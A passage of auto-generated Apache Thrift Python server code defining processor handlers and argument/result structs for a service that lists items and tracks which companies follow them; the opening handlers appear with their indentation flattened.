logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("get_today", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_today_unfollow(self, seqid, iprot, oprot):
args = get_today_unfollow_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_today_unfollow_result()
try:
result.success = self._handler.get_today_unfollow(args.ssid)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except gen_exp as e:
msg_type = TMessageType.REPLY
result.e = e
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("get_today_unfollow", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_stuff_detail(self, seqid, iprot, oprot):
args = get_stuff_detail_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_stuff_detail_result()
try:
result.success = self._handler.get_stuff_detail(args.type_id, args.ssid)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except gen_exp as e:
msg_type = TMessageType.REPLY
result.e = e
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("get_stuff_detail", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_add_company_follow_stuff(self, seqid, iprot, oprot):
args = add_company_follow_stuff_args()
args.read(iprot)
iprot.readMessageEnd()
result = add_company_follow_stuff_result()
try:
result.success = self._handler.add_company_follow_stuff(args.company_name, args.type_id, args.ssid)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except gen_exp as e:
msg_type = TMessageType.REPLY
result.e = e
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("add_company_follow_stuff", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_cancle_company_follow_stuff(self, seqid, iprot, oprot):
args = cancle_company_follow_stuff_args()
args.read(iprot)
iprot.readMessageEnd()
result = cancle_company_follow_stuff_result()
try:
result.success = self._handler.cancle_company_follow_stuff(args.company_name, args.type_id, args.ssid)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except gen_exp as e:
msg_type = TMessageType.REPLY
result.e = e
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("cancle_company_follow_stuff", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_follow_stuff_by_company(self, seqid, iprot, oprot):
args = get_follow_stuff_by_company_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_follow_stuff_by_company_result()
try:
result.success = self._handler.get_follow_stuff_by_company(args.company_name)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except gen_exp as e:
msg_type = TMessageType.REPLY
result.e = e
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
            msg_type = TMessageType.EXCEPTION
            result = ex
        except Exception:
            logging.exception('Unexpected exception in handler')
            msg_type = TMessageType.EXCEPTION
            result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
        oprot.writeMessageBegin("get_follow_stuff_by_company", msg_type, seqid)
        result.write(oprot)
        oprot.writeMessageEnd()
        oprot.trans.flush()

    def process_get_follow_company_by_stuff(self, seqid, iprot, oprot):
        args = get_follow_company_by_stuff_args()
        args.read(iprot)
        iprot.readMessageEnd()
        result = get_follow_company_by_stuff_result()
        try:
            result.success = self._handler.get_follow_company_by_stuff(args.type_id, args.ssid)
            msg_type = TMessageType.REPLY
        except TTransport.TTransportException:
            raise
        except gen_exp as e:
            msg_type = TMessageType.REPLY
            result.e = e
        except TApplicationException as ex:
            logging.exception('TApplication exception in handler')
            msg_type = TMessageType.EXCEPTION
            result = ex
        except Exception:
            logging.exception('Unexpected exception in handler')
            msg_type = TMessageType.EXCEPTION
            result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
        oprot.writeMessageBegin("get_follow_company_by_stuff", msg_type, seqid)
        result.write(oprot)
        oprot.writeMessageEnd()
        oprot.trans.flush()

    def process_get_related_stuff(self, seqid, iprot, oprot):
        args = get_related_stuff_args()
        args.read(iprot)
        iprot.readMessageEnd()
        result = get_related_stuff_result()
        try:
            result.success = self._handler.get_related_stuff(args.ssid)
            msg_type = TMessageType.REPLY
        except TTransport.TTransportException:
            raise
        except gen_exp as e:
            msg_type = TMessageType.REPLY
            result.e = e
        except TApplicationException as ex:
            logging.exception('TApplication exception in handler')
            msg_type = TMessageType.EXCEPTION
            result = ex
        except Exception:
            logging.exception('Unexpected exception in handler')
            msg_type = TMessageType.EXCEPTION
            result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
        oprot.writeMessageBegin("get_related_stuff", msg_type, seqid)
        result.write(oprot)
        oprot.writeMessageEnd()
        oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class get_today_args(object):
    """
    Attributes:
     - ssid

    """

    def __init__(self, ssid=None,):
        self.ssid = ssid

    def read(self, iprot):
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.STRING:
                    self.ssid = iprot.readString().decode('utf-8', errors='replace') if sys.version_info[0] == 2 else iprot.readString()
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
            return
        oprot.writeStructBegin('get_today_args')
        if self.ssid is not None:
            oprot.writeFieldBegin('ssid', TType.STRING, 1)
            oprot.writeString(self.ssid.encode('utf-8') if sys.version_info[0] == 2 else self.ssid)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
all_structs.append(get_today_args)
get_today_args.thrift_spec = (
    None,  # 0
    (1, TType.STRING, 'ssid', 'UTF8', None, ),  # 1
)
class get_today_result(object):
    """
    Attributes:
     - success
     - e

    """

    def __init__(self, success=None, e=None,):
        self.success = success
        self.e = e

    def read(self, iprot):
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 0:
                if ftype == TType.LIST:
                    self.success = []
                    (_etype122, _size119) = iprot.readListBegin()
                    for _i123 in range(_size119):
                        _elem124 = stuff_detail()
                        _elem124.read(iprot)
                        self.success.append(_elem124)
                    iprot.readListEnd()
                else:
                    iprot.skip(ftype)
            elif fid == 1:
                if ftype == TType.STRUCT:
                    # Instantiate the exception struct, then read into it;
                    # calling read on the class itself would misuse the protocol as self.
                    self.e = gen_exp()
                    self.e.read(iprot)
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
            return
        oprot.writeStructBegin('get_today_result')
        if self.success is not None:
            oprot.writeFieldBegin('success', TType.LIST, 0)
            oprot.writeListBegin(TType.STRUCT, len(self.success))
            for iter125 in self.success:
                iter125.write(oprot)
            oprot.writeListEnd()
            oprot.writeFieldEnd()
        if self.e is not None:
            oprot.writeFieldBegin('e', TType.STRUCT, 1)
            self.e.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
all_structs.append(get_today_result)
get_today_result.thrift_spec = (
    (0, TType.LIST, 'success', (TType.STRUCT, [stuff_detail, None], False), None, ),  # 0
    (1, TType.STRUCT, 'e', [gen_exp, None], None, ),  # 1
)
class get_today_unfollow_args(object):
    """
    Attributes:
     - ssid

    """

    def __init__(self, ssid=None,):
        self.ssid = ssid

    def read(self, iprot):
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.STRING:
                    self.ssid = iprot.readString().decode('utf-8', errors='replace') if sys.version_info[0] == 2 else iprot.readString()
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
            return
        oprot.writeStructBegin('get_today_unfollow_args')
        if self.ssid is not None:
            oprot.writeFieldBegin('ssid', TType.STRING, 1)
            oprot.writeString(self.ssid.encode('utf-8') if sys.version_info[0] == 2 else self.ssid)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
all_structs.append(get_today_unfollow_args)
get_today_unfollow_args.thrift_spec = (
    None,  # 0
    (1, TType.STRING, 'ssid', 'UTF8', None, ),  # 1
)
class get_today_unfollow_result(object):
    """
    Attributes:
     - success
     - e

    """

    def __init__(self, success=None, e=None,):
        self.success = success
        self.e = e

    def read(self, iprot):
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 0:
                if ftype == TType.LIST:
                    self.success = []
                    (_etype129, _size126) = iprot.readListBegin()
                    for _i130 in range(_size126):
                        _elem131 = stuff_detail()
                        _elem131.read(iprot)
                        self.success.append(_elem131)
                    iprot.readListEnd()
                else:
                    iprot.skip(ftype)
            elif fid == 1:
                if ftype == TType.STRUCT:
                    # Instantiate the exception struct, then read into it.
                    self.e = gen_exp()
                    self.e.read(iprot)
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
            return
        oprot.writeStructBegin('get_today_unfollow_result')
        if self.success is not None:
            oprot.writeFieldBegin('success', TType.LIST, 0)
            oprot.writeListBegin(TType.STRUCT, len(self.success))
            for iter132 in self.success:
                iter132.write(oprot)
            oprot.writeListEnd()
            oprot.writeFieldEnd()
        if self.e is not None:
            oprot.writeFieldBegin('e', TType.STRUCT, 1)
            self.e.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
all_structs.append(get_today_unfollow_result)
get_today_unfollow_result.thrift_spec = (
    (0, TType.LIST, 'success', (TType.STRUCT, [stuff_detail, None], False), None, ),  # 0
    (1, TType.STRUCT, 'e', [gen_exp, None], None, ),  # 1
)
class get_stuff_detail_args(object):
    """
    Attributes:
     - type_id
     - ssid

    """

    def __init__(self, type_id=None, ssid=None,):
        self.type_id = type_id
        self.ssid = ssid

    def read(self, iprot):
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.I64:
                    self.type_id = iprot.readI64()
                else:
                    iprot.skip(ftype)
            elif fid == 2:
                if ftype == TType.STRING:
                    self.ssid = iprot.readString().decode('utf-8', errors='replace') if sys.version_info[0] == 2 else iprot.readString()
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
            return
        oprot.writeStructBegin('get_stuff_detail_args')
        if self.type_id is not None:
            oprot.writeFieldBegin('type_id', TType.I64, 1)
            oprot.writeI64(self.type_id)
            oprot.writeFieldEnd()
        if self.ssid is not None:
            oprot.writeFieldBegin('ssid', TType.STRING, 2)
            oprot.writeString(self.ssid.encode('utf-8') if sys.version_info[0] == 2 else self.ssid)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
all_structs.append(get_stuff_detail_args)
get_stuff_detail_args.thrift_spec = (
    None,  # 0
    (1, TType.I64, 'type_id', None, None, ),  # 1
    (2, TType.STRING, 'ssid', 'UTF8', None, ),  # 2
)
class get_stuff_detail_result(object):
    """
    Attributes:
     - success
     - e

    """

    def __init__(self, success=None, e=None,):
        self.success = success
        self.e = e

    def read(self, iprot):
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 0:
                if ftype == TType.STRUCT:
                    self.success = stuff_detail()
                    self.success.read(iprot)
                else:
                    iprot.skip(ftype)
            elif fid == 1:
                if ftype == TType.STRUCT:
                    # Instantiate the exception struct, then read into it.
                    self.e = gen_exp()
                    self.e.read(iprot)
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
            return
        oprot.writeStructBegin('get_stuff_detail_result')
        if self.success is not None:
            oprot.writeFieldBegin('success', TType.STRUCT, 0)
            self.success.write(oprot)
            oprot.writeFieldEnd()
        if self.e is not None:
            oprot.writeFieldBegin('e', TType.STRUCT, 1)
            self.e.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
all_structs.append(get_stuff_detail_result)
get_stuff_detail_result.thrift_spec = (
    (0, TType.STRUCT, 'success', [stuff_detail, None], None, ),  # 0
    (1, TType.STRUCT, 'e', [gen_exp, None], None, ),  # 1
)
class add_company_follow_stuff_args(object):
    """
    Attributes:
     - company_name
     - type_id
     - ssid

    """

    def __init__(self, company_name=None, type_id=None, ssid=None,):
        self.company_name = company_name
        self.type_id = type_id
        self.ssid = ssid

    def read(self, iprot):
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.STRING:
                    self.company_name = iprot.readString().decode('utf-8', errors='replace') if sys.version_info[0] == 2 else iprot.readString()
                else:
                    iprot.skip(ftype)
            elif fid == 2:
                if ftype == TType.I64:
                    self.type_id = iprot.readI64()
                else:
                    iprot.skip(ftype)
            elif fid == 3:
                if ftype == TType.STRING:
                    self.ssid = iprot.readString().decode('utf-8', errors='replace') if sys.version_info[0] == 2 else iprot.readString()
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
            return
        oprot.writeStructBegin('add_company_follow_stuff_args')
        if self.company_name is not None:
            oprot.writeFieldBegin('company_name', TType.STRING, 1)
            oprot.writeString(self.company_name.encode('utf-8') if sys.version_info[0] == 2 else self.company_name)
            oprot.writeFieldEnd()
        if self.type_id is not None:
            oprot.writeFieldBegin('type_id', TType.I64, 2)
            oprot.writeI64(self.type_id)
            oprot.writeFieldEnd()
        if self.ssid is not None:
            oprot.writeFieldBegin('ssid', TType.STRING, 3)
            oprot.writeString(self.ssid.encode('utf-8') if sys.version_info[0] == 2 else self.ssid)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
all_structs.append(add_company_follow_stuff_args)
add_company_follow_stuff_args.thrift_spec = (
    None,  # 0
    (1, TType.STRING, 'company_name', 'UTF8', None, ),  # 1
    (2, TType.I64, 'type_id', None, None, ),  # 2
    (3, TType.STRING, 'ssid', 'UTF8', None, ),  # 3
)
class add_company_follow_stuff_result(object):
    """
    Attributes:
     - success
     - e

    """

    def __init__(self, success=None, e=None,):
        self.success = success
        self.e = e

    def read(self, iprot):
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 0:
                if ftype == TType.BOOL:
                    self.success = iprot.readBool()
                else:
                    iprot.skip(ftype)
            elif fid == 1:
                if ftype == TType.STRUCT:
                    # Instantiate the exception struct, then read into it.
                    self.e = gen_exp()
                    self.e.read(iprot)
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
            return
        oprot.writeStructBegin('add_company_follow_stuff_result')
        if self.success is not None:
            oprot.writeFieldBegin('success', TType.BOOL, 0)
            oprot.writeBool(self.success)
            oprot.writeFieldEnd()
        if self.e is not None:
            oprot.writeFieldBegin('e', TType.STRUCT, 1)
            self.e.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
all_structs.append(add_company_follow_stuff_result)
add_company_follow_stuff_result.thrift_spec = (
    (0, TType.BOOL, 'success', None, None, ),  # 0
    (1, TType.STRUCT, 'e', [gen_exp, None], None, ),  # 1
)
class cancle_company_follow_stuff_args(object):
    """
    Attributes:
     - company_name
     - type_id
     - ssid

    """

    def __init__(self, company_name=None, type_id=None, ssid=None,):
        self.company_name = company_name
        self.type_id = type_id
        self.ssid = ssid

    def read(self, iprot):
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.STRING:
                    self.company_name = iprot.readString().decode('utf-8', errors='replace') if sys.version_info[0] == 2 else iprot.readString()
                else:
                    iprot.skip(ftype)
            elif fid == 2:
                if ftype == TType.I64:
                    self.type_id = iprot.readI64()
                else:
                    iprot.skip(ftype)
            elif fid == 3:
                if ftype == TType.STRING:
                    self.ssid = iprot.readString().decode('utf-8', errors='replace') if sys.version_info[0] == 2 else iprot.readString()
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
            return
        oprot.writeStructBegin('cancle_company_follow_stuff_args')
        if self.company_name is not None:
            oprot.writeFieldBegin('company_name', TType.STRING, 1)
            oprot.writeString(self.company_name.encode('utf-8') if sys.version_info[0] == 2 else self.company_name)
            oprot.writeFieldEnd()
        if self.type_id is not None:
            oprot.writeFieldBegin('type_id', TType.I64, 2)
            oprot.writeI64(self.type_id)
            oprot.writeFieldEnd()
        if self.ssid is not None:
            oprot.writeFieldBegin('ssid', TType.STRING, 3)
            oprot.writeString(self.ssid.encode('utf-8') if sys.version_info[0] == 2 else self.ssid)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
all_structs.append(cancle_company_follow_stuff_args)
cancle_company_follow_stuff_args.thrift_spec = (
    None,  # 0
    (1, TType.STRING, 'company_name', 'UTF8', None, ),  # 1
    (2, TType.I64, 'type_id', None, None, ),  # 2
    (3, TType.STRING, 'ssid', 'UTF8', None, ),  # 3
)
class cancle_company_follow_stuff_result(object):
    """
    Attributes:
     - success
     - e

    """

    def __init__(self, success=None, e=None,):
        self.success = success
        self.e = e

    def read(self, iprot):
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 0:
                if ftype == TType.BOOL:
                    self.success = iprot.readBool()
                else:
                    iprot.skip(ftype)
            elif fid == 1:
                if ftype == TType.STRUCT:
                    # Instantiate the exception struct, then read into it.
                    self.e = gen_exp()
                    self.e.read(iprot)
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
            return
        oprot.writeStructBegin('cancle_company_follow_stuff_result')
        if self.success is not None:
            oprot.writeFieldBegin('success', TType.BOOL, 0)
            oprot.writeBool(self.success)
            oprot.writeFieldEnd()
        if self.e is not None:
            oprot.writeFieldBegin('e', TType.STRUCT, 1)
            self.e.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
all_structs.append(cancle_company_follow_stuff_result)
cancle_company_follow_stuff_result.thrift_spec = (
    (0, TType.BOOL, 'success', None, None, ),  # 0
    (1, TType.STRUCT, 'e', [gen_exp, None], None, ),  # 1
)
class get_follow_stuff_by_company_args(object):
    """
    Attributes:
     - company_name

    """

    def __init__(self, company_name=None,):
        self.company_name = company_name

    def read(self, iprot):
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.STRING:
                    self.company_name = iprot.readString().decode('utf-8', errors='replace') if sys.version_info[0] == 2 else iprot.readString()
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
            return
        oprot.writeStructBegin('get_follow_stuff_by_company_args')
        if self.company_name is not None:
            oprot.writeFieldBegin('company_name', TType.STRING, 1)
            oprot.writeString(self.company_name.encode('utf-8') if sys.version_info[0] == 2 else self.company_name)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
all_structs.append(get_follow_stuff_by_company_args)
get_follow_stuff_by_company_args.thrift_spec = (
    None,  # 0
    (1, TType.STRING, 'company_name', 'UTF8', None, ),  # 1
)
class get_follow_stuff_by_company_result(object):
    """
    Attributes:
     - success
     - e

    """

    def __init__(self, success=None, e=None,):
        self.success = success
        self.e = e

    def read(self, iprot):
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 0:
                if ftype == TType.LIST:
                    self.success = []
                    (_etype136, _size133) = iprot.readListBegin()
                    for _i137 in range(_size133):
                        _elem138 = stuff_detail()
                        _elem138.read(iprot)
                        self.success.append(_elem138)
                    iprot.readListEnd()
                else:
                    iprot.skip(ftype)
            elif fid == 1:
                if ftype == TType.STRUCT:
                    # Instantiate the exception struct, then read into it.
                    self.e = gen_exp()
                    self.e.read(iprot)
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
            return
        oprot.writeStructBegin('get_follow_stuff_by_company_result')
        if self.success is not None:
            oprot.writeFieldBegin('success', TType.LIST, 0)
            oprot.writeListBegin(TType.STRUCT, len(self.success))
            for iter139 in self.success:
                iter139.write(oprot)
            oprot.writeListEnd()
            oprot.writeFieldEnd()
        if self.e is not None:
            oprot.writeFieldBegin('e', TType.STRUCT, 1)
            self.e.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
